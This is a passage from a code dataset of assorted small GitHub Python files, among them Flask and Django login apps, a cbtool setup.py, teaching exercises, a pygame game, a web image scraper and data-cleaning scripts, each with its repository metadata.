annot_kws={'va':'top'}, fmt=\".2f\", cbar=False, cmap=\"YlGnBu\")\nm.show()\n\n# Sowohl Franzosen als auch Österreicher hängen stark an ihrem Land\n# Wie bereits aus dem Diagramm erischtlich, ist es eine sehr knappe Entscheidung\n# Österreicher hängen jedoch mit 51,35%, um etwa 2,7% mehr an ihrem Land als Franzosen 
","repo_name":"Stingaaa/5BHW","sub_path":"INFI/Aufgabe5/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5405,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36092989777","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name = 'cbtool',\n\n\n version = '3.0.5',\n author = 'Marcio Silva, Michael Galaxy',\n author_email = 'cbtool-admin@googlegroups.com',\n description = 'CloudBench: Cloud Rapid Experimentation and Analysis Toolkit',\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url = 'https://github.com/ibmcb/cbtool',\n\n python_requires='>=3.6',\n\n # Currently, the only thing we provided on PyPi is the core library.\n # Getting a fully-fledged instance of CB installed will require\n # a proper DEB to be prepared. This just solves the issue of talking\n # talking to the cloudbench API using an already-installed version\n # of cloudbench. \n\n packages = ['cbtool', 'cbtool/lib', 'cbtool/lib/api', 'cbtool/lib/auxiliary', 'cbtool/lib/clouds', 'cbtool/lib/operations', 'cbtool/lib/remote', 'cbtool/lib/stores'],\n\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers',\n 'Topic :: Software Development :: Build Tools',\n 'License :: OSI Approved :: Apache Software License',\n 'Programming Language :: Python :: 3.6',\n ],\n download_url = 'https://github.com/ibmcb/cbtool/archive/3.0.tar.gz',\n keywords = ['cloudbench', 'cloud', 'benchmarking', \"spec\"],\n\n # Currently, we've only listed packages listed as `= pip`\n # from the PUBLIC_dependencies.txt file, because pip install\n # can only recursively attempt to install pip-registered projects.\n # If we want to enable *all* dependencies, we're going to have to fork\n # and register cbtool-needed projects under the CloudBench user account on PyPi.\n install_requires = [\n 'prettytable',\n 'python-daemon',\n 'twisted',\n 'webob',\n 'beaker',\n 'python-redis',\n 'pymongo',\n 'pypureomapi',\n 'python-novaclient',\n 'python-neutronclient',\n 'python-cinderclient',\n 'python-glanceclient',\n 'softlayer',\n 'boto',\n 'apache-libcloud',\n 'docker',\n 'pylxd',\n 'pykube',\n 'docutils',\n 'markup',\n 'pyyaml',\n 'ruamel-yaml',\n 'urllib3',\n 'httplib2shim',\n 'python-dateutil',\n 'pillow',\n 'jsonschema',\n 'mysql-connector',\n 'distro'\n ],\n)\n","repo_name":"ibmcb/cbtool","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","stars":76,"dataset":"github-code","pt":"40"} +{"seq_id":"71314848439","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"compression_rle\n\nFonctions pour notebook sur la compression RLE\n\nAuteurs : Martin Canals et Pierre-William Martelli\n\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nPBM_EXERCICE = [0] * 25\n\n\ndef affichage_pbm(larg, haut, liste_pbm):\n \"\"\"\n affichage_pbm(larg, haut, liste_pbm)\n\n Affiche une image donnee sous format PBM\n larg : nombre de pixels horizontaux\n haut : nombre de pixels verticaux\n liste_pbm : liste de 0 et de 1 qui represente l'image au format PBM\n\n \"\"\"\n dims = (haut, larg)\n mat = np.zeros(dims)\n for row in range(dims[0]):\n for col in range(dims[1]):\n mat[row, col] = (liste_pbm[col + row * dims[1]] + 1) % 2\n\n plt.matshow(mat, cmap='gray')\n plt.show()\n\n\ndef mystere(liste):\n \"\"\"\n mystere(liste)\n\n Fonction mystere. 
Prend une liste en argument, et renvoie une liste\n\n \"\"\"\n retour = []\n bit = 0\n for i in range(len(liste)):\n for j in range(liste[i]):\n retour.append(bit)\n bit = (bit + 1) % 2\n return retour\n\n\ndef affichage_rle(larg, haut, liste_rle):\n \"\"\"\n affichage_rle(larg, haut, liste_rle)\n\n Affiche une image donnee sous format RLE\n larg : nombre de pixels horizontaux\n haut : nombre de pixels verticaux\n liste_rle : liste de nombre qui represente l'image au format PBM\n\n \"\"\"\n affichage_pbm(larg, haut, mystere(liste_rle))\n\n\ndef exercice_aleatoire():\n \"\"\"\n exercice_aleatoire()\n\n Genere une image aleatoire de taille 5x5 au format PBM, et l'affiche\n\n \"\"\"\n matrice_alea = np.random.randint(2, size=(5, 5))\n for row in range(5):\n for col in range(5):\n PBM_EXERCICE[col + row * 5] = matrice_alea[row, col]\n print('PBM_EXERCICE = ', PBM_EXERCICE)\n affichage_pbm(5, 5, PBM_EXERCICE)\n\n\ndef verif_exercice(rle_reponse):\n \"\"\"\n verif_exercice()\n\n Teste si rle_reponse correpond a la compression RLE de PBM_EXERCICE, et\n l'affiche\n rle_reponse : tableau d'entiers, representant le format RLE d'une image\n\n \"\"\"\n if mystere(rle_reponse) == PBM_EXERCICE:\n print('Exercice réussi !')\n else:\n print('Exercice non réussi...')\n if sum(rle_reponse) == 25:\n affichage_rle(5, 5, rle_reponse)\n else:\n print('La somme des entiers de votre tableau devrait être égale à 25 !')\n","repo_name":"pwmartelli/rle","sub_path":"compression_rle.py","file_name":"compression_rle.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22119386660","text":"from flask import Flask, session, request, g, send_file, redirect, render_template, url_for\nfrom shared import app, db, bcrypt\nfrom models import *\n\n# user auth\n@app.before_request\ndef verify_user():\n\tif 'session_id' in session:\n\t\ttry:\n\t\t\tg.user = Session.query.filter_by(\n\t\t\t\t\tsession_id=session['session_id']).first().user.username\n\t\texcept AttributeError:\n\t\t\tsession.pop('session_id')\n\telse:\n\t\tg.user = None\n\n# serve app\n@app.route(\"/\")\ndef index():\n\treturn render_template('index.html')\n\n@app.route(\"/\")\ndef static_file(path):\n\treturn send_from_directory('/static', path)\n\n@app.route(\"/login\", methods=['GET', 'POST'])\ndef login():\n\tif request.method == 'GET':\n\t\tif g.user:\n\t\t\treturn redirect(url_for(\"index\"))\n\t\telse:\n\t\t\treturn send_file('./static/login.html')\n\telif request.method == 'POST':\n\t\tuser = User.login(request.form['username'], request.form['password'])\n\t\tif user:\n\t\t\tg.user = user.username\n\t\t\tsession['session_id'] = Session.create(user.id).session_id\n\t\t\treturn redirect(url_for(\"index\"))\n\t\telse:\n\t\t\treturn redirect(url_for(\"login\"))\n\n@app.route(\"/signup\", methods=['GET', 'POST'])\ndef signup():\n\tif request.method == 'GET':\n\t\tif g.user:\n\t\t\treturn redirect(url_for(\"index\"))\n\t\telse:\n\t\t\treturn send_file('./static/signup.html')\n\telif request.method == 'POST':\n\t\ttry:\n\t\t\tuser = User.create(request.form['username'], request.form['password'])\n\t\t\tg.user = user.username\n\t\t\treturn redirect(url_for(\"index\"))\n\t\texcept:\n\t\t\treturn send_file('./static/signup.html')\n\n@app.route(\"/logout\")\ndef logout():\n\tcurrent_session = session.pop('session_id', None)\n\tif current_session:\n\t\tSession.destroy(current_session)\n\treturn redirect(url_for(\"index\"))\n\nif __name__ == 
'__main__':\n\tapp.run(host='0.0.0.0', debug=True)\n","repo_name":"vitrvvivs/Flask-Auth","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18858606384","text":"# Day 8 we are dealing with dictionaries. We are to create a phonebook and then be able\n# to query this phonebook for a name and return the name=number.\n\n# It seems as if the maps work the same way as a dictionary in Python.\n# They are a way to store (key, value) data points that are stored into a datastructure.\n\n# Link: https://www.hackerrank.com/challenges/30-dictionaries-and-maps/problem\n\nphoneBook = {}\niteration = int(input())\nfor i in range(iteration):\n content = input().strip()\n content = content.split(\" \")\n\n if content[0] not in phoneBook:\n phoneBook[content[0]] = content[1]\n\nwhile True:\n try:\n inp = input()\n if inp in phoneBook:\n print(inp + \"=\" + phoneBook[inp])\n else:\n print(\"Not found\")\n except EOFError:\n break\n","repo_name":"speri203/Programming","sub_path":"Python/day8.py","file_name":"day8.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18261133106","text":"import os\nimport time\nimport threading\nfrom downloadImages.Common import Extractor, Downloader\n\n\ndef main(keywords):\n folder = './' + keywords\n try:\n os.mkdir(folder)\n except FileExistsError:\n pass\n\n extractor = Extractor()\n downloader = Downloader(folder)\n\n refs = extractor.get_web_page_links(keywords)\n print(\"Found \", len(refs), \" websites\")\n\n start = time.time()\n\n def fun(_url, _path):\n _imgs = extractor.get_all_images(_url)\n print('Extracted {} images from {}'.format(len(_imgs), url))\n for _img in _imgs:\n downloader.download(_img, _path)\n\n threads = []\n for url in refs:\n t = threading.Thread(target=fun, args=(url, folder))\n t.start()\n threads.append(t)\n\n for thread in threads:\n thread.join()\n\n end = time.time()\n print('\\nTime spent downloading: {} seconds'.format(round(end - start), 1))\n\n\nif __name__ == '__main__':\n keys = input(\"\\nEnter key words to search for: \")\n main(keys)\n","repo_name":"mewmix/media-scraper","sub_path":"downloadImages/ImageDownloaderFromWebPages.py","file_name":"ImageDownloaderFromWebPages.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32656235012","text":"from urllib.request import urlopen, urlretrieve\r\nfrom bs4 import BeautifulSoup\r\n\r\n# В файле находится одна таблица.\r\n# Просуммируйте все числа в ней.\r\nresp = urlopen('https://stepik.org/media/attachments/lesson/209723/3.html') # скачиваем файл\r\nhtml = resp.read().decode('utf8') # считываем содержимое\r\nsoup = BeautifulSoup(html, 'html.parser') # делаем суп\r\ndata = soup.find_all('td')\r\nnumber = [int(d.text) for d in data]\r\nprint(sum(number))\r\n\r\n# В файле находится одна таблица.\r\n# Просуммируйте все числа в ней.\r\n# Теперь мы добавили разных тегов для изменения стиля отображения.\r\n# Для доступа к ячейкам используйте возможности BeautifulSoup.\r\nresp1 = urlopen('https://stepik.org/media/attachments/lesson/209723/4.html') # скачиваем файл\r\nhtml = resp1.read().decode('utf8') # считываем содержимое\r\nsoup = BeautifulSoup(html, 'html.parser') # делаем суп\r\ndata = soup.find_all('td')\r\nnumber = [int(d.text) for d in 
data]\r\nprint(*number)\r\nprint(sum(number))\r\n\r\nresp2 = urlopen('https://stepik.org/media/attachments/lesson/209723/5.html') # скачиваем файл\r\nhtml = resp2.read().decode('utf8') # считываем содержимое\r\nsoup = BeautifulSoup(html, 'html.parser') # делаем суп\r\ndata = soup.find_all('td')\r\nnumber = [int(d.text) for d in data]\r\nprint(sum(number))\r\n","repo_name":"sashnat/Homework","sub_path":"stepik_python_practice/1_4 lesson.py","file_name":"1_4 lesson.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21059825309","text":"# coding: utf-8\nfrom api.form import LoginForm\nfrom flask import request\nfrom common.utils import param_error\nfrom common.views import auth\nfrom models import UserInfo\nfrom common import const\nfrom flask_login import login_user, current_user\nfrom common.response import reply\nimport logging\n\n\ndef login():\n form = LoginForm(request.form)\n if not form.validate():\n return param_error(form.errors)\n user = UserInfo.query.filter_by(\n user_number=form.user_number.data,\n record_status=const.record_normal\n ).first()\n if not user or user.password != form.password.data:\n return reply(\n success=False,\n message=\"用户不存在或密码错误\"\n )\n if user.disabled == const.user_disabled_true:\n return reply(\n success=False,\n message=\"账号被冻结,无法登陆\"\n )\n auth.login(user)\n return reply(\n success=True,\n message=\"登陆成功\",\n )\n\n\ndef login_out():\n if current_user.is_authenticated:\n auth.login_out()\n return reply(\n success=True,\n )\n","repo_name":"KAGAnoRBQ/Reservation-Sysu","sub_path":"api/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35532864530","text":"def binary_search(array, target, start, end):\n while start <= end:\n mid = (start + end) // 2\n if array[mid] == target:\n return mid\n elif array[mid] > target:\n end = mid - 1\n else:\n start = mid + 1\n return None\n\nn = int(input())\ndata = list(map(int, input().split()))\nm = int(input())\nsearch_data = list(map(int, input().split()))\n\nfor i in search_data:\n res = binary_search(data, i, 0, n - 1)\n if res != None:\n print('yes', end=' ')\n else:\n print('no', end=' ')","repo_name":"wk1219/Algorithm-Prob","sub_path":"CodingTest/BinarySearch/7-5.py","file_name":"7-5.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"16103349674","text":"from ..cluster import *\nfrom ..io.datasets import covid19_repertoire\nfrom ..io.output import get_cluster_contents, simple_single_cluster_output, path_in_results\nimport matplotlib.pyplot as plt\n\n\ndef main():\n data = covid19_repertoire()\n size_frequencies(data)\n random_representative_comparison(data)\n\n\ndef random_representative_comparison(data):\n representative = data.sample().keys()[0]\n s = ''\n for combo in PROPERTY_COMBINATIONS:\n index = profile_cluster(data, combo)\n cluster = get_cluster_of_representative(representative, index)\n s += ' + '.join(combo).upper() + '\\n'\n s += output_single_cluster_with_representative(cluster, representative, data) + '\\n'\n with open(path_in_results('profile_method/comparison/representative_clusters.txt'), 'w') as f:\n f.write(s)\n\n\ndef output_single_cluster_with_representative(cluster, representative, data):\n output = simple_single_cluster_output(cluster, data)\n 
representative_sequence = str(data[representative])\n return output.replace(representative_sequence, '> ' + representative_sequence)\n\n\ndef get_cluster_of_representative(representative, index):\n for cluster in get_cluster_contents(index):\n if representative in cluster:\n return cluster\n return None\n\n\ndef size_frequencies(data):\n for combo in PROPERTY_COMBINATIONS:\n index = profile_cluster(data, combo)\n fname = '_'.join(combo)\n name = 'cluster by ' + ' + '.join(combo)\n size_frequencies_plot(index, name, fname)\n\n\ndef size_frequencies_plot(index, name, fname):\n contents = get_cluster_contents(index)\n sizes = list(map(lambda x: len(x), contents))\n frequencies = {}\n for size in sizes:\n frequencies[size] = frequencies.get(size, 0) + 1\n x = sorted(frequencies.keys())\n y = []\n for point in x:\n y.append(frequencies[point])\n plt.figure()\n plt.bar(x, y)\n plt.axis([0, 50, 0, 300])\n plt.title(name)\n plt.xlabel('cluster size')\n plt.ylabel('amount of clusters')\n plt.savefig(fname=path_in_results(f'profile_method/comparison/{fname}.png'))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"svalkiers/clusTCR","sub_path":"clustcr/modules/faiss_clustering/src/plots/compare_clusters.py","file_name":"compare_clusters.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"40"} +{"seq_id":"41623812698","text":"from django import forms\nfrom .models import Role, Task\nfrom django.contrib.admin.widgets import AdminDateWidget\n\nclass RoleForm(forms.ModelForm):\n def __init__(self, *args, **kwargs):\n super(RoleForm, self).__init__(*args, **kwargs)\n for field in self.fields.values():\n field.widget.attrs = {\n 'class': 'form-control'\n }\n class Meta:\n model = Role\n fields = ('title',)\n labels = {'title' : '役割名'}\n\nclass TaskForm(forms.ModelForm):\n def __init__(self, *args, **kwargs):\n super(TaskForm, self).__init__(*args, **kwargs)\n for field in self.fields.values():\n field.widget.attrs = {\n 'class': 'form-control'\n }\n class Meta:\n STATUS_CHOICES = [(1, '未完了'),(2, '作業中'),(3, '完了')]\n model = Task\n fields = ('title', 'status','due_date')\n labels = {\n 'title': 'タスク名',\n 'status': '状態',\n 'due_date': '期限',\n }","repo_name":"takusugar0/weekplan","sub_path":"weekplan_app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"25821787136","text":"from django.db import models\nfrom datetime import datetime\nfrom pessoas.models import Pessoa\n\nclass Receita(models.Model):\n pessoa = models.ForeignKey(Pessoa, on_delete=models.CASCADE)\n nome_receita = models.CharField(max_length=200)\n ingredientes = models.TextField()\n modo_preparo = models.TextField()\n tempo_preparo = models.IntegerField()\n rendimento = models.CharField(max_length=100)\n categoria = models.CharField(max_length=100)\n data_receita = models.DateTimeField(default=datetime.now, blank=True)\n publicada = models.BooleanField(default=False)\n foto_receita = models.ImageField(upload_to='fotos/%Y/%m/%d', blank=True)\n \n def __str__(self):\n return self.nome_receita\n\n def clean(self):\n self.categoria = self.categoria.capitalize()\n self.nome_receita = self.nome_receita.capitalize()\n\n# Receita.objects.create(nome_receita=\"Bolo de Chocolate\",\n# ingredientes=\"-Farinha\\n -Ovo\\n Leite\\n Chocolate\\n Pó de arroz\",\n# modo_preparo=\"Mexer tudo, mexe bem até ter uma massa homogenea boa\",\n# 
tempo_preparo=40,\n# rendimento=\"5 Pessoas\",\n# categoria=\"Doces\")\n\n\n\n\n\n\n\n","repo_name":"brenascimento/Receitas-Django","sub_path":"receitas/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"70951625722","text":"\n# Импортируем библиотеку pygame\nimport pygame\nfrom pygame import *\nfrom Player import *\nfrom Security import *\nimport time\n\n\n# Объявляем переменные\nWIN_WIDTH = 1000 # Ширина создаваемого окна\nWIN_HEIGHT = 500 # Высота\nDISPLAY = (WIN_WIDTH, WIN_HEIGHT) # Группируем ширину и высоту в одну переменную\nBACKGROUND_COLOR = \"#004400\"\n\n\ndef main():\n pygame.init() # Инициация PyGame, обязательная строчка\n\n screen = pygame.display.set_mode(DISPLAY) # Создаем окошко\n pygame.display.set_caption(\"Kate adventure\") # Пишем в шапку\n background_image = pygame.image.load('Images/imgonline-com-ua-Resize-CBt8AmKAPc-AmoyShare.png')\n\n\n left = right = False # по умолчанию - стоим\n\n sec = Security(600, 300)\n hero = Player(100, 250) # создаем героя по (x,y) координатам\n\n timer = pygame.time.Clock()\n\n entities = pygame.sprite.Group()\n entities.add(hero)\n entities.add(sec)\n\n pygame.mixer.pre_init(44100, 16, 2, 4096)\n music = pygame.mixer.music.load('Images/casey-edwards-feat (mp3cut.net).mp3')\n pygame.mixer.music.play(-1, 0.0)\n\n\n\n\n while True:\n screen.blit(background_image, (0, 0)) # Основной цикл программы\n timer.tick(40)\n for e in pygame.event.get(): # Обрабатываем события\n if e.type == QUIT:\n raise SystemExit\n if e.type == KEYDOWN and e.key == K_LEFT:\n left = True\n if e.type == KEYDOWN and e.key == K_RIGHT:\n right = True\n if e.type == KEYUP and e.key == K_RIGHT:\n right = False\n if e.type == KEYUP and e.key == K_LEFT:\n left = False\n if e.type == KEYDOWN and e.key == K_ESCAPE:\n raise SystemExit\n\n\n\n if hero.rect.x >= 700:\n screen.fill((0, 0, 0))\n screen.blit(pygame.image.load('Images/20230221_224141 (1).jpg'), (300, 0))\n pygame.display.update()\n time.sleep(1.5)\n hero.rect.x = 100\n\n if (((hero.rect.x - sec.rect.x)**2 + (hero.rect.y - sec.rect.y)**2)**0.5 < 60) and (hero.rect.x < sec.rect.x) and (hero.rect.y > sec.rect.y):\n screen.fill((0, 0, 0))\n screen.blit(pygame.image.load('Images/imgonline-com-ua-Resize-QOaXSVgW8gb0.jpg'), (170, 0))\n pygame.display.update()\n time.sleep(1.5)\n hero.rect.x = 100\n\n\n hero.update(left, right) # передвижение\n sec.update() # передвижение\n entities.draw(screen)\n entities.empty()\n if hero.rect.y > sec.rect.y:\n entities.add(sec)\n entities.add(hero)\n else:\n entities.add(hero)\n entities.add(sec)\n\n\n\n pygame.display.update() # обновление и вывод всех изменений на экран\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"PapaOfficial/Kate_adventure","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6157760622","text":"\"\"\"newsroomFramework URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. 
Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\nfrom django.contrib import admin\n\nfrom cms.views import *\nfrom kms.views import *\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^kms/$', kms),\n url(r'^add/$', ArticleCreateView.as_view(), name='article-add'),\n url(r'^(?P\\d+)/edit/$', ArticleUpdateView.as_view(), name='article-edit'),\n url(r'^(?P\\d+)/delete/$', ArticleDeleteView.as_view(), name='article-delete'),\n url(r'^(?P\\d+)/publish/$', PublishedArticle, name='article-publish'),\n url(r'^(?P\\d+)/publish/rdf$', PublishedRdf, name='article-rdf'),\n url(r'^search/', ArticleSearchView.as_view(), name='article-search'),\n url(r'^list/', ArticleListView.as_view(), name='article-list'),\n url(r'^menu/', Menu, name='menu'),\n]\n","repo_name":"Benedito-Medeiros-Neto-UnB/TacProgWeb","sub_path":"web-ontology/newsroomFramework-master/newsroomFramework/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"30320556589","text":"from typing import Optional, Iterable, Tuple, Union\nimport logging\n\nfrom uuid import uuid4\nfrom dependency_injector.wiring import Provide, inject\nfrom sqlalchemy.orm import Session\n\nfrom src.classes import UserSession, ValorHoraInput, FileStream\nfrom src.enums import UserType\nfrom src.exceptions import ValidationError\nfrom src.models import HorarioPadrao, Estacionamento, Endereco, Upload\nfrom src.services import Uploader, ImageProcessor\nfrom src.container import Container\nfrom src.utils import validate_telefone\n\n\nclass EstacionamentoCrudRepo:\n ERRO_TOTAL_VAGA_INV = 'total_vaga_nao_positivo'\n ERRO_HORA_P_INV = 'hora_padrao_fecha_depois_de_abrir'\n ERRO_DESC_GRANDE = 'descricao_muito_grande'\n ERRO_VALOR_HORA_NAO_POSITIVO = 'valor_hora_preco_nao_positivo'\n ERRO_VALOR_HORA_VEICULO_NAO_ENCONTRADO = 'valor_hora_veiculo_nao_encontrado'\n ERRO_SEM_PERMISSAO = 'sem_permissao'\n ERRO_CADASTRO_FINALIZADO = 'cadastro_ja_terminado'\n ERRO_ESTACIO_NAO_ENCONTRADO = 'estacio_nao_encontrado'\n ERRO_CADASTRO_NAO_FINALIZADO = 'cadastro_nao_terminado'\n ERRO_NOME_GRANDE = 'nome_muito_grande'\n TEL_MUITO_GRANDE = 'telefone_muito_grande'\n TEL_FORMATO_INV = 'telefone_formato_invalido'\n TEL_SEM_COD_INTER = 'telefone_sem_cod_internacional'\n FOTO_FORMATO_INVALIDO = 'foto_formato_invalido'\n FOTO_PROCESSING_ERRO = 'foto_processing_error'\n ERRO_UPLOAD = 'upload_error'\n\n GROUP_UPLOAD_FOTO = 'foto_estacio'\n\n @inject\n def __init__(\n self,\n width_foto: int,\n height_foto: int,\n uploader: Uploader = Provide[Container.uploader], \n image_proc: ImageProcessor = Provide[Container.image_processor]\n ) -> None:\n self.width_foto = width_foto\n self.height_foto = height_foto\n self.uploader = uploader\n self.image_processor = image_proc\n\n def create(\n self, user_sess: UserSession, sess: Session,\n total_vaga: int,\n horario_padrao: HorarioPadrao,\n valores_hora: Optional[Iterable[ValorHoraInput]] = None,\n estacio_id: Optional[str] = None,\n descricao: Optional[str] = None\n ) -> Tuple[bool, Union[str, Estacionamento]]:\n if user_sess is None:\n return False, self.ERRO_SEM_PERMISSAO\n\n adm = user_sess.user \n if user_sess.tipo == UserType.SISTEMA:\n estacio: Estacionamento = 
sess.query(Estacionamento).get(estacio_id)\n else:\n estacio: Estacionamento = adm.estacionamento\n\n if estacio is None:\n return False, self.ERRO_ESTACIO_NAO_ENCONTRADO\n\n if estacio.cadastro_terminado:\n return False, self.ERRO_CADASTRO_FINALIZADO\n\n _val_desc = self._validate_descricao(descricao)\n if _val_desc:\n return False, _val_desc\n\n _val_total = self._validate_total_vaga(total_vaga)\n if _val_total:\n return False, _val_total\n\n error_hora_p = horario_padrao.validate()\n if error_hora_p:\n return False, error_hora_p\n\n if valores_hora:\n try:\n real_valores_hora = [v.to_valor_hora(sess) for v in valores_hora]\n estacio.valores_hora = real_valores_hora\n except ValidationError as e:\n if e.attr == 'valor':\n return False, self.ERRO_VALOR_HORA_NAO_POSITIVO\n else:\n return False, self.ERRO_VALOR_HORA_VEICULO_NAO_ENCONTRADO\n\n estacio.total_vaga = estacio.qtd_vaga_livre = total_vaga\n estacio.descricao = descricao\n estacio.horario_padrao = horario_padrao\n estacio.cadastro_terminado = True\n\n sess.commit()\n\n return True, estacio\n\n def edit( \n self, user_sess: UserSession, sess: Session,\n nome: Optional[str] = None,\n telefone: Optional[str] = None,\n endereco: Optional[Endereco] = None,\n total_vaga: Optional[int] = None,\n descricao: Optional[str] = None,\n foto: Optional[FileStream] = None,\n estacio_id: Optional[str] = None,\n ) -> Tuple[bool, Union[str, Estacionamento]]:\n if user_sess is None:\n return False, self.ERRO_SEM_PERMISSAO\n \n adm = user_sess.user\n\n if user_sess.tipo != UserType.ESTACIONAMENTO:\n estacio = sess.query(Estacionamento).get(estacio_id)\n else:\n estacio = adm.estacionamento\n\n if estacio is None:\n return False, self.ERRO_ESTACIO_NAO_ENCONTRADO\n\n if estacio.cadastro_terminado is False:\n return False, self.ERRO_CADASTRO_NAO_FINALIZADO\n\n _val_nome = self._validate_nome(nome)\n if _val_nome:\n return False, _val_nome\n\n _val_total = self._validate_total_vaga(total_vaga)\n if _val_total:\n return False, _val_total\n \n _val_desc = self._validate_descricao(descricao)\n if _val_desc:\n return False, _val_desc\n\n _val_tel = self._validate_tel(telefone)\n if _val_tel:\n return False, _val_tel\n\n estacio.nome = nome or estacio.nome\n estacio.telefone = telefone or estacio.telefone\n estacio.total_vaga = total_vaga or estacio.total_vaga\n estacio.endereco = endereco or estacio.endereco\n\n if descricao is not None:\n descricao = descricao.strip()\n estacio.descricao = None if descricao == '' else descricao\n\n if foto is not None:\n try:\n fstream = self.image_processor.compress(foto, self.width_foto, self.height_foto)\n except AttributeError:\n return False, self.FOTO_FORMATO_INVALIDO\n except Exception as ex:\n logging.getLogger(__name__).error('edit(): Image processing error.', exc_info=ex)\n return False, self.FOTO_PROCESSING_ERRO\n\n try:\n fname = str(uuid4()) + '.' 
+ self.image_processor.get_default_image_format()\n upload = self.uploader.upload(fstream, self.GROUP_UPLOAD_FOTO, fname)\n except Exception as ex:\n logging.getLogger(__name__).error('edit(): Upload error.', exc_info=ex)\n return False, self.ERRO_UPLOAD\n\n ori_id = int(estacio.foto_fk)\n self.uploader.delete(estacio.foto)\n\n estacio.foto = upload\n sess.query(Upload).filter(Upload.id == ori_id).delete()\n\n sess.commit()\n\n return True, estacio\n\n def list(self, sess: Session, amount: int = 0, index: int = 0) -> Tuple[bool, Union[str, Iterable[Estacionamento]]]:\n if index < 0:\n return True, tuple()\n\n query = sess.query(Estacionamento).offset(index)\n\n if amount > 0:\n query = query.limit(amount)\n\n estacios = query.all()\n\n return True, estacios\n\n def get(self, user_sess: UserSession, sess: Session, estacio_id: Optional[str] = None) -> Tuple[bool, Union[str, Estacionamento]]:\n if estacio_id is None:\n if user_sess is not None and user_sess.tipo == UserType.ESTACIONAMENTO:\n estacio = user_sess.user.estacionamento\n else:\n estacio = None\n else:\n estacio = sess.query(Estacionamento).get(estacio_id)\n \n if estacio is None:\n return False, self.ERRO_ESTACIO_NAO_ENCONTRADO\n\n return True, estacio\n\n def _validate_total_vaga(self, total_vaga: int) -> Optional[str]:\n if total_vaga is not None and total_vaga <= 0:\n return self.ERRO_TOTAL_VAGA_INV\n\n def _validate_descricao(self, descricao: Optional[str]) -> Optional[str]:\n if descricao is not None and len(descricao) > 2000:\n return self.ERRO_DESC_GRANDE\n\n def _validate_nome(self, nome: Optional[str]) -> Optional[str]:\n if nome is not None and len(nome) > 100:\n return self.ERRO_NOME_GRANDE\n\n def _validate_tel(self, tel: Optional[str]) -> Optional[str]:\n if tel is not None:\n if len(tel) > 20:\n return self.TEL_MUITO_GRANDE\n if not validate_telefone(tel):\n return self.TEL_FORMATO_INV\n if not tel.startswith('+') or len(tel) < 3:\n return self.TEL_SEM_COD_INTER\n","repo_name":"BoaVaga/boavaga_server","sub_path":"src/repo/estacionamento_crud_repo.py","file_name":"estacionamento_crud_repo.py","file_ext":"py","file_size_in_byte":8253,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74674080440","text":"import pandas as pd\nimport numpy as np\n\ndata = pd.read_csv(\"all_news.csv\")\nrecord = pd.read_csv(\"the_record.csv\")\n\ndata = pd.concat([data, record], sort=False)\n# drop this extra index column that was accidentally carried over\n# data = data.drop('Unnamed: 0', 1)\ndata = data[data.columns.drop(list(data.filter(regex='Unnamed: ')))]\n\n\n# the following lines are not combined into one drop_duplicate because if we try to drop with subset=[\"title\", \"text\"] it would only drop rows where both the title AND text match each other\n# but we want to drop all instances where the title OR the text is a duplicate\n\n# drop articles with the same title (keeps the first entry by default)\ndata = data.drop_duplicates(subset=\"title\")\n\n# drop articles with the same text (keeps the first entry by default)\ndata = 